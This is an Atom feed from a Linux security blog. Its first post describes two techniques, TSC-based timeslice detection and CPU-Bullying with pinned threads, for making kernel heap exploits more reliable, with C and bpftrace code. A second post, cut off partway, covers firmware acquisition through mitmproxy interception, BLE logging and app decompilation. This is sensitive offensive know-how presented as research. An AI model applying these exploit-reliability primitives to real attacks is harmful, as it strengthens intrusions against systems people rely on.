<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://blog.eb9f.de/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.eb9f.de/" rel="alternate" type="text/html" /><updated>2026-01-28T23:30:20+00:00</updated><id>https://blog.eb9f.de/feed.xml</id><title type="html">0xeb9f</title><subtitle>Just another one of those blogs on Linux and stuff</subtitle><entry><title type="html">Improving Linux Heap Exploit Reliability with FreshSlices and CPU-Bullying</title><link href="https://blog.eb9f.de/2026/01/28/freshslices_and_cpubullies.html" rel="alternate" type="text/html" title="Improving Linux Heap Exploit Reliability with FreshSlices and CPU-Bullying" /><published>2026-01-28T00:00:00+00:00</published><updated>2026-01-28T00:00:00+00:00</updated><id>https://blog.eb9f.de/2026/01/28/freshslices_and_cpubullies</id><content type="html" xml:base="https://blog.eb9f.de/2026/01/28/freshslices_and_cpubullies.html"><![CDATA[<p><strong>tl;dr: This blog post presents two (afaik) novel, generic techniques for improving the reliability of kernel heap exploits.</strong></p>

<p>Exploits built around heap-based memory corruptions will never be perfectly reliable. There are multiple factors contributing to this, one being that the heap is shared among all tasks (user processes and kernel threads) running on a machine. Thus, the task running the exploit cannot exercise perfect control over it.</p>

<p>Much has already been written about the art of shaping the kernel heap and creating desired layouts reliably. This post assumes a reader who is somewhat familiar with the subject, i.e., I will not recount any basics here. Instead, I will focus on two generic techniques for improving an exploit process’ control over the kernel heap.</p>

<ol id="markdown-toc">
  <li><a href="#motivating-example" id="markdown-toc-motivating-example">Motivating Example</a></li>
  <li><a href="#technique-i-freshslices" id="markdown-toc-technique-i-freshslices">Technique I: FreshSlices</a></li>
  <li><a href="#technique-ii-cpu-bullying" id="markdown-toc-technique-ii-cpu-bullying">Technique II: CPU-Bullying</a></li>
  <li><a href="#project-ideas" id="markdown-toc-project-ideas">Project Ideas</a></li>
  <li><a href="#code" id="markdown-toc-code">Code</a></li>
</ol>

<h2 id="motivating-example">Motivating Example</h2>

<p>To get started, let’s look at the timeline of a prototypical, heap-based kernel exploit. (In the example we will use a UAF vulnerability, but the same reasoning applies to OOB writes and DFs.)</p>

<p><img src="/media/freshslices_and_cpubullies/drawings-succ_expl.jpg" alt="drawings-succ_expl" />
<em>Timeline of a successful kernel heap exploit.</em></p>

<p>Here:</p>
<ol>
  <li>The exploit task makes a syscall that results in the freeing of the vulnerable object.</li>
  <li>Another syscall is performed to cause the allocation of another object in the slot previously occupied by the vulnerable object.</li>
  <li>During a third syscall, a dangling pointer to the vulnerable object is used and the resulting type-confusion is exploited.</li>
</ol>

<p>So far, so good – but there is a time window between events 1 and 2 where the slot of the vulnerable object is vacant. I will call this time interval an <strong>“exploit-critical region” (ECR)</strong>. We can informally <strong>define an ECR as a time span in which any heap operation that is not controlled or observable by the exploit task has the potential of causing the exploit to fail.</strong> A single exploit may have multiple ECRs.</p>

<p>To get a feeling for how an uncontrolled heap operation during an ECR may cause exploit failure, we can have a look at the following alternative timeline.</p>

<p><img src="/media/freshslices_and_cpubullies/drawings-fail_exp.jpg" alt="drawings-fail_exp" />
<em>Timeline of a failed kernel heap exploit.</em></p>

<p>Here:</p>
<ol>
  <li>The exploit task makes a syscall that results in the freeing of the vulnerable object.</li>
  <li>An interrupt occurs, and on exit from the interrupt handler, the scheduler is invoked. It decides to withdraw the CPU from the exploit task.</li>
  <li>Some unrelated task is scheduled. It performs a syscall that causes a heap allocation that reuses the vacant slot of the vulnerable object.</li>
  <li>When the exploit task gets the CPU back, it tries to allocate the fake object in the slot previously occupied by the vulnerable object; however, this endeavor is doomed to failure.</li>
  <li>The UAF is triggered but operates on the wrong object – a good recipe for blinking shift keys.</li>
</ol>

<p>In general, the <strong>reliability of heap exploitation is degraded by the following factors</strong>:</p>
<ol>
  <li>unknown initial heap state,</li>
  <li>randomization-based exploit mitigations,</li>
  <li><strong>other actors using the same heap</strong> (above example),</li>
  <li>task migration,</li>
  <li>delayed work mechanisms.</li>
</ol>

<p>I’ll now present two techniques aimed at addressing the third factor. It is assumed that exploitation can reliably take place on a single CPU via pinning. However, it may be possible to adapt the first technique to scenarios where pinning is blocked.</p>
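<p>For reference, pinning the exploit task is typically done via <code class="language-plaintext highlighter-rouge">sched_setaffinity</code>. A minimal sketch (the helper name <code class="language-plaintext highlighter-rouge">pin_to_cpu</code> is mine):</p>

```c
#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to a single CPU so that all slab operations
 * we trigger go through that CPU's per-CPU caches. */
static int pin_to_cpu(int cpu)
{
	cpu_set_t set;

	CPU_ZERO(&set);
	CPU_SET(cpu, &set);

	/* pid 0 selects the calling thread */
	return sched_setaffinity(0, sizeof(set), &set);
}
```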

<h2 id="technique-i-freshslices">Technique I: FreshSlices</h2>

<p><a href="https://www.vittoriozaccaria.net/blog/notes-on-linux-eevdf">Task scheduling</a> in the Linux kernel is a somewhat complex topic and our discussion is going to remain on a qualitative level. In general, the scheduler’s job is to multiplex the CPU among all runnable tasks. For our purposes, it suffices to know that the scheduler assigns a fraction of the CPU to each task and tries to ensure that in any given interval $\Delta t$ every runnable task has run for the time $c\Delta t$, where $c$ is the fraction of the CPU granted to the task. In reality, of course, $\Delta t$ is not arbitrarily small but somewhere on the order of milliseconds.</p>

<p>From this high-level design, it follows that a task which has already been executing for some time has consumed a larger share of its allotted CPU budget relative to its competitors. The key observation here is that <strong>the instantaneous risk of a task losing the CPU to another task increases the longer it has been running</strong>.</p>

<p>This implies that we want our ECR to be as close as possible to the start of our run on the CPU that the scheduler has granted us. Thus, we need a way to determine when “we just got the CPU back after a break on the bench”.</p>

<p>To do this we can sample the time stamp counter (TSC) register in a tight loop. As the timescale on which we can sample the TSC is small compared to the other relevant timescales (IRQ handlers, IRQ handler followed by a no-op context switch, or preemption by another task) we can reliably use it to determine the <strong>duration of our task’s runs on the CPU</strong>, the <strong>time we spent on the runqueue</strong> waiting for the CPU, and the <strong>moment we get the CPU back</strong>. We can furthermore tell if we got the CPU back after a preemption, an interrupt, or an interrupt followed by a no-op context switch as those timescales are (most of the time) sufficiently different.</p>

<p><img src="/media/freshslices_and_cpubullies/drawings-tsc_sc.jpg" alt="drawings-tsc_sc" />
<em>TSC-sampling method for tracing scheduler operation.</em></p>
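<p>The <code class="language-plaintext highlighter-rouge">rdtsc()</code> helper used in the measurement loop below can be implemented with a few lines of inline assembly; a sketch for x86-64 (the exact fencing is my choice and may differ from the original code):</p>

```c
#include <stdint.h>

/* Read the time stamp counter. The lfence instructions keep the
 * rdtsc from being reordered with surrounding instructions. */
static inline uint64_t rdtsc(void)
{
	uint32_t lo, hi;

	__asm__ __volatile__("lfence\n\t"
			     "rdtsc\n\t"
			     "lfence"
			     : "=a"(lo), "=d"(hi)
			     :
			     : "memory");
	return ((uint64_t)hi << 32) | lo;
}
```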

<p>Let’s use this method to detect when the scheduler re-evaluates our presence on the CPU, i.e., when our task is involved in a <code class="language-plaintext highlighter-rouge">sched_switch</code>. In particular, we are not interested in interrupts that do not enter the scheduler as those are irrelevant from an exploitation point of view.</p>

<p>Concretely, the measurement logic of our program looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint64_t</span> <span class="n">start</span> <span class="o">=</span> <span class="n">rdtsc</span><span class="p">();</span>
<span class="kt">uint64_t</span> <span class="n">prev</span> <span class="o">=</span> <span class="n">start</span><span class="p">;</span>

<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">i</span> <span class="o">&lt;</span> <span class="n">N_TIMESLICES</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">cur</span> <span class="o">=</span> <span class="n">rdtsc</span><span class="p">();</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">cur</span> <span class="o">-</span> <span class="n">prev</span> <span class="o">&gt;</span> <span class="n">SCHED_RUN_CYCLES</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">timeslices</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">prev</span> <span class="o">-</span> <span class="n">start</span><span class="p">;</span>
        <span class="n">off_times</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">cur</span> <span class="o">-</span> <span class="n">prev</span><span class="p">;</span>
        <span class="n">start</span> <span class="o">=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="n">i</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">loop_total</span> <span class="o">+=</span> <span class="n">cur</span> <span class="o">-</span> <span class="n">prev</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">prev</span> <span class="o">=</span> <span class="n">cur</span><span class="p">;</span>
    <span class="n">loops</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><em>An implementation of the FreshSlices technique.</em></p>

<p>Where:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">SCHED_RUN_CYCLES</code> (approx. 18us, found empirically) is a threshold (in cycles, i.e., TSC quanta) meant to separate IRQ handlers with and without a <code class="language-plaintext highlighter-rouge">sched_switch</code></li>
  <li><code class="language-plaintext highlighter-rouge">loop_total</code> approximates the total number of cycles spent executing the measurement loop</li>
  <li><code class="language-plaintext highlighter-rouge">N_TIMESLICES</code> is the number of <code class="language-plaintext highlighter-rouge">sched_switch</code> events we want to detect</li>
  <li><code class="language-plaintext highlighter-rouge">timeslices[]</code> is an array of cycles between distinct <code class="language-plaintext highlighter-rouge">sched_switch</code> events where we were <code class="language-plaintext highlighter-rouge">next</code> and then <code class="language-plaintext highlighter-rouge">prev</code></li>
  <li><code class="language-plaintext highlighter-rouge">off_times[]</code> is an array of cycles between distinct <code class="language-plaintext highlighter-rouge">sched_switch</code> events where we were <code class="language-plaintext highlighter-rouge">prev</code> and then <code class="language-plaintext highlighter-rouge">next</code>, or the duration of a single no-op switch</li>
</ul>

<p>Running this program and plotting a histogram of the measured <code class="language-plaintext highlighter-rouge">timeslices</code> array gives us the following result.</p>

<p><img src="/media/freshslices_and_cpubullies/hist_ts_single_idle.png" alt="hts_idle_single" />
<em>Histogram of timeslices of the test program measured by the test program itself.</em></p>

<p>We can validate that our measurement is correct by writing a small <code class="language-plaintext highlighter-rouge">bpftrace</code> script that attaches to the <code class="language-plaintext highlighter-rouge">sched_switch</code> tracepoint and collects the information we would expect to see in the <code class="language-plaintext highlighter-rouge">timeslices</code> array.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BEGIN
{
	printf("Tracing CPU scheduler... Hit Ctrl-C to end.\n");
	@target_comm = str($1);
}

tracepoint:sched:sched_switch
{
	if (args.next_comm == @target_comm &amp;&amp;
	    args.prev_comm == @target_comm &amp;&amp;
	    @start != 0) {
          @usecs = hist((nsecs - @start) / 1000);
	  @start = nsecs;
	} else if (args.next_comm == @target_comm) {
	  @start = nsecs;
	} else if (args.prev_comm == @target_comm &amp;&amp; @start != 0) {
          @usecs = hist((nsecs - @start) / 1000);
	  @start = 0;
	}
}
</code></pre></div></div>

<p>Running this script while performing the experiment can be used to confirm the measurement results.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@usecs:
[16, 32)               3 |@@@@@@@@@@@@@@@@@@@@@@@@@@                          |
[32, 64)               6 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[64, 128)              0 |                                                    |
[128, 256)             0 |                                                    |
[256, 512)             5 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@         |
[512, 1K)              0 |                                                    |
[1K, 2K)               0 |                                                    |
[2K, 4K)               0 |                                                    |
[4K, 8K)               0 |                                                    |
[8K, 16K)              0 |                                                    |
[16K, 32K)             1 |@@@@@@@@                                            |
[32K, 64K)             1 |@@@@@@@@                                            |
[64K, 128K)            2 |@@@@@@@@@@@@@@@@@                                   |
[128K, 256K)           2 |@@@@@@@@@@@@@@@@@                                   |
</code></pre></div></div>
<p><em>Histogram of timeslices of the test program measured by the bpf program.</em></p>

<p>The above experiments were performed on a relatively calm desktop system. Repeating them on the same system while building a Linux kernel on all cores yields the following results.</p>

<p><img src="/media/freshslices_and_cpubullies/hist_ts_single_busy.png" alt="hist_ts_single_busy" />
<em>Histogram of timeslices of the test program measured by the test program itself (while building the Linux kernel).</em></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@usecs:
[2K, 4K)              15 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|
[4K, 8K)               2 |@@@@@@                                              |
[8K, 16K)              1 |@@@                                                 |
</code></pre></div></div>
<p><em>Histogram of timeslices of the test program measured by the bpf program (while building the Linux kernel).</em></p>

<p>All in all, the TSC-sampling method described in this section allows an exploit program to trace the scheduler’s operation on its CPU, thus enabling more informed decisions about when to commit to the execution of an ECR.</p>
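<p>Put to use in an exploit, the measurement loop collapses into a small gate in front of each ECR; a self-contained sketch (the <code class="language-plaintext highlighter-rouge">rdtsc</code> helper and the threshold value are mine and must be tuned per machine):</p>

```c
#include <stdint.h>

/* Assumption: gaps above this many cycles indicate a sched_switch;
 * found empirically per machine (roughly tens of microseconds). */
#define SCHED_RUN_CYCLES 100000UL

static inline uint64_t rdtsc(void)
{
	uint32_t lo, hi;

	__asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
	return ((uint64_t)hi << 32) | lo;
}

/* Spin until a gap between consecutive TSC samples tells us that we
 * just got the CPU back after a sched_switch. Returns the cycles we
 * spent off-CPU; the caller starts its ECR immediately afterwards. */
static uint64_t wait_for_fresh_timeslice(void)
{
	uint64_t prev = rdtsc();

	for (;;) {
		uint64_t cur = rdtsc();

		if (cur - prev > SCHED_RUN_CYCLES)
			return cur - prev; /* fresh slice: commit now */
		prev = cur;
	}
}
```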

<p><em>Note: Exploits sometimes do a <code class="language-plaintext highlighter-rouge">sched_yield()</code> before starting an ECR. This gives the scheduler an early chance to select a more eligible task to run, i.e., if the call returns we know that the scheduler has just decided that we are the most eligible task. However, it neither tells us <strong>how</strong> eligible we were, nor does it change any scheduling-related parameters of our process. The advantage of the above technique is that it gives us more information (duration of previous runs on the CPU, time spent off-CPU) that we can use to decide whether we want to “take” our current run to perform the ECR. (An added bonus is that this method cannot be blocked via seccomp profiles.)</em></p>

<h2 id="technique-ii-cpu-bullying">Technique II: CPU-Bullying</h2>

<p>FreshSlices aims to address unreliability factor number three by committing to ECRs only when we determine that there is a low risk of our task being preempted by another. However, it doesn’t <em>guarantee</em> that we are not preempted; thus, wouldn’t it be nice if we could also reduce the probability that a preempting task is using the heap? CPU-Bullying is a technique to achieve just that.</p>

<p>The scheduler aims to distribute load evenly across CPUs – a process called <em>load balancing</em> (<a href="https://web.cs.ucdavis.edu/~araybuck/teaching/papers/the_linux_schedule_a_decade_of_wasted_cores.pdf">ref</a> and <a href="https://oska874.gitbooks.io/process-scheduling-in-linux/content/chapter10.html">ref</a>). Most of the tasks on a system are not bound to a specific CPU, and are thus free to be moved around by the scheduler’s load balancing code.</p>

<p>The idea behind <strong>CPU-Bullying</strong> is simple: <strong>spawn a number of CPU-bound tasks on the same core as the exploit task to force the migration of unrelated tasks to other CPUs</strong>. As the execution of those tasks does not cause any kernel heap usage, <strong>being preempted by them is irrelevant</strong> from an exploit perspective.</p>
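<p>A sketch of the bully-spawning logic (the helper names and the thread count are mine, not necessarily those of the original <code class="language-plaintext highlighter-rouge">cpu_bully</code> program):</p>

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>

#define N_BULLIES 10 /* assumption: ten bullies, as in the demo run */

/* Busy-spin forever. Pure userspace work: no syscalls, and thus no
 * kernel heap allocations that could disturb an ECR. */
static void *bully_fn(void *arg)
{
	(void)arg;
	for (;;)
		__asm__ __volatile__("" ::: "memory");
	return NULL;
}

/* Spawn CPU-bound threads pinned to `cpu` so the load balancer
 * migrates unrelated, movable tasks to other CPUs. */
static int spawn_bullies(int cpu)
{
	cpu_set_t set;
	pthread_attr_t attr;
	pthread_t tid;

	CPU_ZERO(&set);
	CPU_SET(cpu, &set);

	if (pthread_attr_init(&attr))
		return -1;
	if (pthread_attr_setaffinity_np(&attr, sizeof(set), &set))
		return -1;

	for (int i = 0; i < N_BULLIES; i++)
		if (pthread_create(&tid, &attr, bully_fn, NULL))
			return -1;
	return 0;
}
```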

<p>A small <code class="language-plaintext highlighter-rouge">bpftrace</code> script can be used to observe task migrations.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BEGIN
{
    printf("Tracing CPU migration from/to CPU0... Hit Ctrl-C to end.\n");
}

tracepoint:sched:sched_migrate_task
{
    if (args.orig_cpu == 0 &amp;&amp; args.dest_cpu != 0) {
        printf("---&gt;&gt; %d\t'%s'\n", args.pid, args.comm);
    } else if (args.dest_cpu == 0 &amp;&amp; args.orig_cpu != 0) {
        printf("&lt;&lt;--- %d\t'%s'\n", args.pid, args.comm);
    }
}
</code></pre></div></div>
<p><em><code class="language-plaintext highlighter-rouge">bpftrace</code> script to trace migration from/to CPU0.</em></p>

<p>Under normal operation, there is a constant stream of migration from and to a CPU.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./trace_task_migration_cpu0.bt
Attached 2 probes
Tracing CPU migration from/to CPU0... Hit Ctrl-C to end.
&lt;&lt;--- 5278	'threaded-ml'
&lt;&lt;--- 3035	'pipewire-pulse'
---&gt;&gt; 5278	'threaded-ml'
&lt;&lt;--- 2804	'Xorg'
---&gt;&gt; 3035	'pipewire-pulse'
---&gt;&gt; 2804	'Xorg'
&lt;&lt;--- 4922	'threaded-ml'
---&gt;&gt; 18377	'kworker/u48:11'
---&gt;&gt; 4922	'threaded-ml'
&lt;&lt;--- 2804	'Xorg'
&lt;&lt;--- 18431	'alacritty'
...
</code></pre></div></div>
<p><em>Load balancing task migration from and to CPU0.</em></p>

<p>Another interesting observable is the set of tasks that are scheduled on a given CPU in a fixed time interval. This requires a (slightly) longer <code class="language-plaintext highlighter-rouge">bpftrace</code> script, but in the end we can confirm that our CPU0 idles ~95% of the time.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./tasks_cpu0.bt
...
pid 05269	comm AudioOutputDevi	total rt 529 us
pid 00018	comm ksoftirqd/0    	total rt 13 us
pid 04922	comm threaded-ml    	total rt 3006 us
pid 02464	comm opensnitchd    	total rt 535 us
pid 05278	comm threaded-ml    	total rt 4440 us
pid 02832	comm brave          	total rt 510 us
pid 18911	comm StreamT~ns #912	total rt 342 us
pid 18715	comm kworker/0:1    	total rt 124 us
pid 05274	comm threaded-ml    	total rt 267 us
pid 04734	comm event_engine   	total rt 1491 us
pid 05501	comm chromium       	total rt 334 us
pid 02825	comm pavucontrol    	total rt 3419 us
pid 03968	comm Chrome_ChildIOT	total rt 143 us
pid 00000	comm swapper/0      	total rt 947829 us
pid 05280	comm ThreadPoolSingl	total rt 1998 us
pid 05268	comm AudioProcessing	total rt 13883 us
pid 03035	comm pipewire-pulse 	total rt 1467 us
pid 03995	comm WebRTC_W_and_N 	total rt 348 us
...
</code></pre></div></div>
<p><em>Tasks running on CPU0 during a period of 1s.</em></p>

<p>Spawning a large number of CPU-bound tasks on the same CPU as the one running the exploit task leads to a distinct exodus of unrelated tasks.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;&lt;--- 19133	'cpu_bully'
---&gt;&gt; 19125	'bpftrace'
---&gt;&gt; 3895	'brave'
---&gt;&gt; 2804	'Xorg'
---&gt;&gt; 5033	'Compositor'
---&gt;&gt; 5027	'brave'
---&gt;&gt; 6367	'SharedWorker th'
---&gt;&gt; 4728	'event_engine'
---&gt;&gt; 10069	'G1 Service'
---&gt;&gt; 3994	'WebRTC_Signalin'
---&gt;&gt; 2457	'thermald'
---&gt;&gt; 5516	'chromium'
---&gt;&gt; 13434	'HangWatcher'
---&gt;&gt; 5757	'HangWatcher'
---&gt;&gt; 5500	'CacheThread_Blo'
---&gt;&gt; 17926	'HangWatcher'
---&gt;&gt; 3899	'HangWatcher'
---&gt;&gt; 3981	'HangWatcher'
---&gt;&gt; 18756	'kworker/u48:7'
---&gt;&gt; 18518	'kworker/u48:13'
---&gt;&gt; 19000	'ServiceWorker t'
---&gt;&gt; 5713	'Chrome_ChildIOT'
</code></pre></div></div>
<p><em>Migration of unrelated tasks away from CPU0 when performing CPU-Bullying.</em></p>

<p>The <code class="language-plaintext highlighter-rouge">cpu_bully</code> program pins itself to CPU0, spawns ten CPU-bound threads (also pinned to CPU0), and then busy-waits for a while to give the load balancer a chance to migrate all movable tasks to other CPUs. We can clearly see this happening using our first script.</p>

<p>It then goes on to simulate an ECR by changing its <code class="language-plaintext highlighter-rouge">comm</code> to <code class="language-plaintext highlighter-rouge">ecr</code> (and later to <code class="language-plaintext highlighter-rouge">no_ecr</code> to mark the end of the simulated ECR). Using the second script, we can confirm that only a minimal number of unrelated tasks (only those also pinned to CPU0) are scheduled during the ECR.</p>
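<p>Changing a task’s <code class="language-plaintext highlighter-rouge">comm</code> from userspace is a one-liner via <code class="language-plaintext highlighter-rouge">prctl</code>; a sketch (the helper name is mine):</p>

```c
#include <sys/prctl.h>

/* Rename the calling task so that external observers (e.g., the
 * bpftrace scripts) can tell ECR and non-ECR phases apart. */
static int mark_ecr(int in_ecr)
{
	return prctl(PR_SET_NAME, in_ecr ? "ecr" : "no_ecr", 0, 0, 0);
}
```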

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>----
pid 19212	comm cpu_bully/5    	total rt 93314 us
pid 19207	comm cpu_bully/0    	total rt 89998 us
pid 19060	comm kworker/0:2    	total rt 14 us
pid 19214	comm cpu_bully/7    	total rt 89994 us
pid 19216	comm cpu_bully/9    	total rt 89990 us
pid 19209	comm cpu_bully/2    	total rt 89992 us
pid 19211	comm cpu_bully/4    	total rt 93319 us
pid 19208	comm cpu_bully/1    	total rt 89990 us
pid 19206	comm cpu_bully      	total rt 89982 us
pid 19210	comm cpu_bully/3    	total rt 89985 us
pid 19215	comm cpu_bully/8    	total rt 89997 us
pid 19213	comm cpu_bully/6    	total rt 89995 us
----
pid 19212	comm cpu_bully/5    	total rt 76916 us
pid 19207	comm cpu_bully/0    	total rt 78819 us
pid 19060	comm kworker/0:2    	total rt 24 us
pid 00762	comm irq/174-iwlwifi	total rt 17 us
pid 19214	comm cpu_bully/7    	total rt 76027 us
pid 19216	comm cpu_bully/9    	total rt 79462 us
pid 19209	comm cpu_bully/2    	total rt 77559 us
pid 19211	comm cpu_bully/4    	total rt 76149 us
pid 00107	comm irq/9-acpi     	total rt 1147 us
pid 19208	comm cpu_bully/1    	total rt 79143 us
pid 19206	comm ecr             	total rt 92847 us
pid 19210	comm cpu_bully/3    	total rt 78881 us
pid 19215	comm cpu_bully/8    	total rt 79910 us
pid 19213	comm cpu_bully/6    	total rt 78741 us
----
pid 19212	comm cpu_bully/5    	total rt 75100 us
pid 19207	comm cpu_bully/0    	total rt 75160 us
pid 19060	comm kworker/0:2    	total rt 9 us
pid 19214	comm cpu_bully/7    	total rt 74969 us
pid 19216	comm cpu_bully/9    	total rt 76472 us
pid 19209	comm cpu_bully/2    	total rt 75875 us
pid 19211	comm cpu_bully/4    	total rt 75261 us
pid 19208	comm cpu_bully/1    	total rt 74867 us
pid 19206	comm no_ecr          	total rt 92950 us
pid 19210	comm cpu_bully/3    	total rt 76807 us
pid 19215	comm cpu_bully/8    	total rt 76178 us
pid 19213	comm cpu_bully/6    	total rt 76647 us
pid 00023	comm migration/0    	total rt 2 us
</code></pre></div></div>
<p><em>Tasks scheduled on CPU0 in three consecutive seconds during a simulated ECR with CPU-Bullying.</em></p>

<p>Repeating the above experiments on a loaded system (compiling Linux on all cores) yields the same results.</p>

<p>In general, CPU-Bullying seems to be a promising technique to practically eliminate the threat that unexpected heap usage poses to exploit reliability. I also consider it to be strictly more powerful than FreshSlices. However, FreshSlices may still be useful in situations where sandboxes limit an exploit’s resource consumption or block the <code class="language-plaintext highlighter-rouge">sched_setaffinity</code> syscall.</p>

<h2 id="project-ideas">Project Ideas</h2>

<p>It seems like these ideas could be a nice starting point for a student project – because they are exactly that: <em>ideas</em>. While they might sound reasonable and my ad-hoc experiments seem to back this belief, they lack a proper evaluation. There is even a closely related <a href="https://www.usenix.org/conference/usenixsecurity22/presentation/zeng">paper</a> that could serve as a blueprint for such a work.</p>

<h2 id="code">Code</h2>

<p>The code mentioned in this post can be found <a href="https://github.com/vobst/freshslices_and_cpubullies">here</a>.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[tl;dr: This blog post presents two (afaik) novel, generic techniques for improving the reliability of kernel heap exploits.]]></summary></entry><entry><title type="html">Pieps: A Case Study in Non-invasive Firmware Acquisition</title><link href="https://blog.eb9f.de/2025/01/30/pieps_00.html" rel="alternate" type="text/html" title="Pieps: A Case Study in Non-invasive Firmware Acquisition" /><published>2025-01-30T00:00:00+00:00</published><updated>2025-01-30T00:00:00+00:00</updated><id>https://blog.eb9f.de/2025/01/30/pieps_00</id><content type="html" xml:base="https://blog.eb9f.de/2025/01/30/pieps_00.html"><![CDATA[<p><em>In retrospect, it is often incomprehensible why one started going down a rabbit hole. No matter how I fell in, my trusty recipe for climbing back out is to write everything down in a blog post — so have fun.</em></p>

<p>This time, for some reason that is no longer entirely clear to me, I wanted to examine the firmware of my <a href="https://www.pieps.com/en/product/pro-ips/">Pieps IPS Pro</a>. Briefly, the Austrian company Pieps is a leading manufacturer of <a href="https://en.wikipedia.org/wiki/Avalanche_transceiver">avalanche beacons</a>, a class of personal safety devices designed to locate people buried under snow avalanches. Unsurprisingly, their main target audience are backcountry skiers.</p>

<p>However, for the sake of this post, the specific device does not matter all that much. I’d rather like to use the opportunity for a little case study in firmware acquisition, i.e., the process of obtaining a device’s firmware for subsequent analysis. In particular, we will focus on <em>non-invasive</em> firmware acquisition, as a soldering iron should be nowhere near a personal safety device that you still intend to use afterward…</p>

<ol id="markdown-toc">
  <li><a href="#network-analysis" id="markdown-toc-network-analysis">Network Analysis</a></li>
  <li><a href="#app-analysis" id="markdown-toc-app-analysis">App Analysis</a>    <ol>
      <li><a href="#android" id="markdown-toc-android">Android</a></li>
      <li><a href="#ios" id="markdown-toc-ios">iOS</a></li>
      <li><a href="#net" id="markdown-toc-net">.NET</a></li>
    </ol>
  </li>
  <li><a href="#firmware-download" id="markdown-toc-firmware-download">Firmware Download</a></li>
  <li><a href="#firmware-analysis" id="markdown-toc-firmware-analysis">Firmware Analysis</a></li>
  <li><a href="#conclusion" id="markdown-toc-conclusion">Conclusion</a></li>
</ol>

<h2 id="network-analysis">Network Analysis</h2>

<p>There are a number of simple, non-invasive techniques for obtaining a device’s firmware. In the easiest case, it is available for download on the vendor’s website. For some devices, it can also be obtained directly from the device via a web interface, shell, or removable storage medium. In our case, however, those methods do not apply.</p>

<p>Like many other modern consumer electronics, the IPS Pro itself offers only very limited user interaction and all management tasks are performed via a smartphone app. In such cases, another easy approach is to capture an over-the-air (OTA) update. For our device, firmware updates are performed over Bluetooth Low Energy (BLE) via the smartphone app. We can attempt to capture the update on two links: between the vendor’s backend servers and the app, or between the app and the device.</p>

<p>Most often, communication between the app and the backend uses standard HTTPS on port 443. To capture this traffic, we can configure a transparent HTTP(S) proxy (<a href="https://docs.mitmproxy.org/stable/howto-transparent/">mitmproxy</a> in my case) on the router that the device is using and install the proxy’s certificate on the device. As a side note, using a regular, non-transparent proxy would not work, as the app’s communication with the backend is not proxy-aware <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. Also, note that the app is not using certificate pinning, so we can save ourselves the trouble of setting up one of the Frida-based solutions to bypass it.</p>

<p>On the BLE side, the procedure depends on the mobile device running the app. I had an iOS device at hand so that was what I ended up using. Here, you must first install a <a href="https://developer.apple.com/services-account/download?path=/iOS/iOS_Logs/iOSBluetoothLogging.mobileconfig">configuration profile for extended Bluetooth logging</a>. You also need to download the Additional Tools for Xcode; in particular, we need the PacketLogger tool. Then, we can connect the device to a Mac and start capturing <a href="https://www.bluetooth.com/wp-content/uploads/Files/Specification/HTML/Core-54/out/en/host-controller-interface/host-controller-interface-functional-specification.html">Host Controller Interface (HCI)</a> traffic. See this <a href="https://novelbits.io/debugging-sniffing-secure-ble-ios/">post</a> for more information.</p>

<p>Now, we can observe network and BLE traffic during events such as app startup, account login, device pairing, or device configuration. Unfortunately, the devices I had available were all running the latest firmware <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>; thus, obtaining a firmware sample that way was not possible.</p>

<h2 id="app-analysis">App Analysis</h2>

<p>Since waiting for the vendor to release a firmware update is boring, we can cut the wait short by analyzing the mobile app itself. After all, it must include all the logic required to download and install a new firmware image. Here, I generally prefer working with Android applications, simply because it is a much more open platform.</p>

<h3 id="android">Android</h3>

<p>After <a href="https://apkpure.com/pieps/com.pieps.app">downloading the APK</a>, opening it in <a href="https://github.com/skylot/jadx">JADX</a>, and navigating to the main Activity we end up at the following class.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">package</span> <span class="nn">crc64185aabf9370d726d</span><span class="o">;</span>

<span class="o">[...]</span>
<span class="kn">import</span> <span class="nn">mono.android.Runtime</span><span class="o">;</span>
<span class="o">[...]</span>

<span class="cm">/* loaded from: classes.dex */</span>
